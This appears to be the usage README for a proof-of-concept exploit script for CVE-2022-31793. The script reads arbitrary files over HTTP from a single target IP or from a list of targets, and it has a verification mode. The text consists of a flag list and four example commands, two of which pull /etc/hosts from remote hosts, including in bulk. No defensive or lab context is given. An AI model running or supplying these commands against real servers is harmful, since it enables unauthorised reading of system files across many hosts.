
Proof-of-concept exploit for CVE-2022-31793 with IP/file-based target scanning, validation mode, and arbitrary file read via HTTP requests.
-u specify IP -l specify IP file -v verify mode -f specify file to read
python poc.py -u ip -v
python poc.py -l url.txt -v
python poc.py -u ip -f /etc/hosts
python poc.py -l url.txt -f /etc/hosts